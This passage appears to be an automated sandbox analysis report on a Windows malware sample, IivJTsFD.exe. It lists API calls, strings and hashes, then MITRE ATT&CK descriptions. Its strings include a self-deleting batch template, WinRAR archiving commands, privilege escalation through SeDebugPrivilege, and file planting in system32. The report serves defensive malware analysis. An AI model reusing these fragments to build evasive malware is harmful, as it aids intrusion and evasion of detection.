Part of subcall function 0025119F: AdjustTokenPrivileges.ADVAPI32(002513EF,00000000,?,00000010,00000000,00000000), ref: 002511EB
Part of subcall function 0025119F: CloseHandle.KERNEL32(002513EF), ref: 002511FA
Part of subcall function 0025119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,002513EF), ref: 00251203

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 002513A8
SeDebugPrivilege, xrefs: 002513D3

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$SeDebugPrivilege
API String ID: 4123949106-120938002
Opcode ID: b55cb7cb15a654097943e39d5523a389a1bb5b2dce22168010d0f2636db30ad3
Instruction ID: 2b33ae3b542127ee117cb2dc53d1c405ad783ce22f965cd9fc493afbab0d6a80
Opcode Fuzzy Hash: b55cb7cb15a654097943e39d5523a389a1bb5b2dce22168010d0f2636db30ad3
Instruction Fuzzy Hash: C9316271D5020AEADF20DFA5CC45FEEBBB8EB44706F2040A9E904B2141E7709E69CF64

Function 0025239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 002523CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00252464
GetFileSize.KERNEL32(00000000,00000000), ref: 00252472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 002524A8
memset.MSVCRT ref: 002524B9
strrchr.MSVCRT ref: 002524C9
wsprintfA.USER32 ref: 002524DE
strrchr.MSVCRT ref: 002524ED
memset.MSVCRT ref: 002524F2
memset.MSVCRT ref: 00252505
wsprintfA.USER32 ref: 00252524
Sleep.KERNEL32(000007D0), ref: 00252535
Sleep.KERNEL32(000007D0), ref: 0025255D
memset.MSVCRT ref: 0025256E
wsprintfA.USER32 ref: 00252585
memset.MSVCRT ref: 002525A6
wsprintfA.USER32 ref: 002525CA
Sleep.KERNEL32(000007D0), ref: 002525D0
Sleep.KERNEL32(000007D0,?,?), ref: 002525E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002525FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00252611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00252642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0025265B
SetEndOfFile.KERNEL32 ref: 0025266D
CloseHandle.KERNEL32(00000000), ref: 00252676
RemoveDirectoryA.KERNEL32(?), ref: 00252681

Strings

%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 002525C4
C:\Users\user\AppData\Local\Temp\, xrefs: 002523B1, 002523B6, 002524CD
%s\, xrefs: 0025257F
-ibck, xrefs: 002525BA
%s%s, xrefs: 002524D8
%s X -ibck "%s" "%s\", xrefs: 0025251E

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2169341206
Opcode ID: cb4c2c90ceef5fb8be7094fdf274270f8c5ac5e6cba3d5d487e99f72eb660554
Instruction ID: b09511d0b64f0fcd0c36065dc25e124468c927fbab1653bcf9d1ed01041b9eb2
Opcode Fuzzy Hash: cb4c2c90ceef5fb8be7094fdf274270f8c5ac5e6cba3d5d487e99f72eb660554
Instruction Fuzzy Hash: FB81D0B1514344ABD710EF60EC49FABB7ACEB85756F00051AFA44D21D0D770DA9C8B6A

Function 0025274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00252766
memset.MSVCRT ref: 00252774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00252787
wsprintfA.USER32 ref: 002527AB

Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
Part of subcall function 0025185B: rand.MSVCRT ref: 00251894

wsprintfA.USER32 ref: 002527C6
CopyFileA.KERNEL32(?,00254C80,00000000), ref: 002527D4
wsprintfA.USER32 ref: 002527F4

Part of subcall function 00251973: PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
Part of subcall function 00251973: Sleep.KERNEL32(00000064), ref: 002519C6
Part of subcall function 00251973: wsprintfA.USER32 ref: 002519EC
Part of subcall function 00251973: CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
Part of subcall function 00251973: GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
Part of subcall function 00251973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
Part of subcall function 00251973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65

DeleteFileA.KERNEL32(?,?,00254E54,00254E58), ref: 0025281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00254E54,00254E58), ref: 00252832

Strings

c_31892.nls, xrefs: 002527DE
C:\Users\user\AppData\Local\Temp\, xrefs: 002527B6
\WinRAR\Rar.exe, xrefs: 00252793
%s\%s, xrefs: 002527EE
%s%s, xrefs: 002527A5
C:\Windows\system32, xrefs: 002527E3
%s%.8x.exe, xrefs: 002527BB

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3961832207
Opcode ID: eb0e739a0c7a902314a1c8fdcc54a860fefdb11f3fcd8dbedecc44bc41a9a47d
Instruction ID: 465b6fc65c58c1a8a5c9c40f204ce60e2617430017e6f4f1e2a046f37ea90ff4
Opcode Fuzzy Hash: eb0e739a0c7a902314a1c8fdcc54a860fefdb11f3fcd8dbedecc44bc41a9a47d
Instruction Fuzzy Hash: 332168B6D5031C7BDB10E7A49C89FDB736CEB0574AF4015A1BE44E2081E670DFAC4A68

Function 00251581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
Part of subcall function 0025185B: rand.MSVCRT ref: 00251894

wsprintfA.USER32 ref: 002515AA
wsprintfA.USER32 ref: 002515C6
lstrlen.KERNEL32(?), ref: 002515D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 002515EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00251609
CloseHandle.KERNEL32(00000000), ref: 00251612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0025162D

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 0025158A, 002515B3, 002515B8, 002515B9
C:\Users\user\AppData\Local\Temp\, xrefs: 00251599
%s%.8x.bat, xrefs: 002515A4
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 002515C0
open, xrefs: 00251627

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$open
API String ID: 617340118-3916927215
Opcode ID: e29d1019d75a3ef2b9aaa5361f13083ea9f3bd8b989445bfb0f3acbc3aab1389
Instruction ID: c0d656f9daa6d08b6dd811699464a1cf919d79bfa35baae8ff537d882f5bf6ec
Opcode Fuzzy Hash: e29d1019d75a3ef2b9aaa5361f13083ea9f3bd8b989445bfb0f3acbc3aab1389
Instruction Fuzzy Hash: 371137769112287BD720D7A5AC8DEEB7B6CDF5A792F000051F959E3040DA709F988BB4

Function 0025120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00251400), ref: 00251226
GetProcAddress.KERNEL32(00000000), ref: 0025122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00251400), ref: 0025123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00251400), ref: 00251250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 0025129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 002512B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 002512F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00251400), ref: 0025130A

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00251262
ntdll.dll, xrefs: 00251219
ZwQuerySystemInformation, xrefs: 00251212

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3064767164
Opcode ID: 6510726b1097aa9f726cc1e00b4a0f1dd570652549718dd35b1a5ae07c77643c
Instruction ID: 742322b9ae38b8885aafe575118003d5cb192546b3940e8f175621daa3a2588c
Opcode Fuzzy Hash: 6510726b1097aa9f726cc1e00b4a0f1dd570652549718dd35b1a5ae07c77643c
Instruction Fuzzy Hash: D3210631615322BBD720DF65DC08B6BBAA8FB85B42F000918FD45D6280C770DA68C7AD

Function 0025189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 002518B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 002518D3
CloseHandle.KERNEL32(I%%), ref: 002518E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002518F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00251901
CloseHandle.KERNEL32(?), ref: 0025190A

Strings

I%%, xrefs: 002518E0

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%%
API String ID: 876959470-603810813
Opcode ID: b38f0013d821a52886cbc42aecc39f4513ff5128f7aaa3325e86f710fb0bc117
Instruction ID: 5712b804b07b863d0c1d69db3c82cb6c6ba03b38f2ad115cf60bfbc3844fe635
Opcode Fuzzy Hash: b38f0013d821a52886cbc42aecc39f4513ff5128f7aaa3325e86f710fb0bc117
Instruction Fuzzy Hash: AC017176901228BBCB21AB95EC4CDDFBF7DEF85772F104021F915A51A0D6314A28CAA4

Function 00252692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,002529DB,?,00000001), ref: 002526A7
WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,002529DB,?,00000001), ref: 002526B5
lstrlen.KERNEL32(?), ref: 002526C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 002526CE
lstrcpy.KERNEL32(00000004,?), ref: 002526E3
lstrcpy.KERNEL32(?,00000004), ref: 0025271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0025272D
SetEvent.KERNEL32 ref: 0025273C

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: ffa3b2ecfef6e6df90627b0184635842f9fa9cd210a75857922743975f90a95d
Instruction ID: 67fdbf88752735fd52440f45e27f44fe613d3f7c4e73f918b6f93ca0b3330aa7
Opcode Fuzzy Hash: ffa3b2ecfef6e6df90627b0184635842f9fa9cd210a75857922743975f90a95d
Instruction Fuzzy Hash: 16116736521300EFCB22EF15FD4C86ABBA9FB9A7677104016F858871A0D6708999DB5C

Function 00251B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00251BCD
rand.MSVCRT ref: 00251BD8
memset.MSVCRT ref: 00251C43
memcpy.MSVCRT(?,BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00251C4F
lstrcat.KERNEL32(?,.exe), ref: 00251C5D

Strings

.exe, xrefs: 00251C57
BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk, xrefs: 00251B8A, 00251B9C, 00251C15, 00251C49

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk
API String ID: 122620767-1514442079
Opcode ID: 5ee85a96b539ce00bdadf91d87fd223dd734c56d6a84423e5de0e42157103023
Instruction ID: af9348f1c23a049ef18cf3e170a34d15923f68631906c8107eb3e7a363943b2d
Opcode Fuzzy Hash: 5ee85a96b539ce00bdadf91d87fd223dd734c56d6a84423e5de0e42157103023
Instruction Fuzzy Hash: 4A219B32E253906ED22623367C44B697B148FA372BF16009BFC810B1D2D17409FDC26D

Function 00251319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00251334
GetProcAddress.KERNEL32(00000000), ref: 0025133B
memset.MSVCRT ref: 00251359

Strings

ntdll.dll, xrefs: 0025132F
NtSystemDebugControl, xrefs: 0025132A

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 4fd56bc0164305816fc70fa7e750ad2e08331b9e19a7b1e7474f437c2b453c9b
Instruction ID: 7b7337ea19fec97c27b878c5cdbd23a57e5ace63073eb45ea395a4a332d6f22c
Opcode Fuzzy Hash: 4fd56bc0164305816fc70fa7e750ad2e08331b9e19a7b1e7474f437c2b453c9b
Instruction Fuzzy Hash: 7A01847161030EBFDB10DFA4EC89A6FBB68FB41316F00456AFD01A1190D3708679CA59

Function 00251DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00251E0B
lstrcpy.KERNEL32(?,00000001), ref: 00251E1C
strrchr.MSVCRT ref: 00251E2B
lstrcmpiA.KERNEL32(?,00254488), ref: 00251E48
lstrlen.KERNEL32(00254488), ref: 00251E53

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: d6d72bbbab2f1e2eaef6a398b6bfa19aa0ad0be8318c7357c11a44d1030f0b4c
Instruction ID: 95cc84e17711200788e9b28912565e2262b63514bc4eea77048bf7d1298fa076
Opcode Fuzzy Hash: d6d72bbbab2f1e2eaef6a398b6bfa19aa0ad0be8318c7357c11a44d1030f0b4c
Instruction Fuzzy Hash: FE01DB729143166FDB119B60FC4DBD7779CDB04356F040065DD45D30D1D6B49A988B98

Function 0025185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
srand.MSVCRT ref: 00251878
rand.MSVCRT ref: 00251880
srand.MSVCRT ref: 00251890
rand.MSVCRT ref: 00251894

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 3c7051733bee7004e8f8c7961da32a77d6c731762231f1efa5a07b69fbb9ae53
Instruction ID: faa0ad3c6281b79c0a460cf67d2e76c37f8694e612f2c4cc46d0d210545f4ca9
Opcode Fuzzy Hash: 3c7051733bee7004e8f8c7961da32a77d6c731762231f1efa5a07b69fbb9ae53
Instruction Fuzzy Hash: 0EE01277A10318BBD700A7A9FC4A99EBBACDE841B2B110566F600D3294E574E9448AB8

Function 00256014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0025603C
GetProcAddress.KERNEL32(00000000,00256064), ref: 0025604F

Strings

kernel32.dll, xrefs: 0025603B

Memory Dump Source

Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 31987c20f7e8a8615187873746e88437352565774cb2d902dc657eb413b7ea0a
Instruction ID: 13ad865660f176a50a05d82ac499ffb45d4511a9902f14cb43714a45c3058e01
Opcode Fuzzy Hash: 31987c20f7e8a8615187873746e88437352565774cb2d902dc657eb413b7ea0a
Instruction Fuzzy Hash: 41F0F6B114028A8FDF708E64CC48BEE37E4EB15711F90052AED09CB681DB3486198B18

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
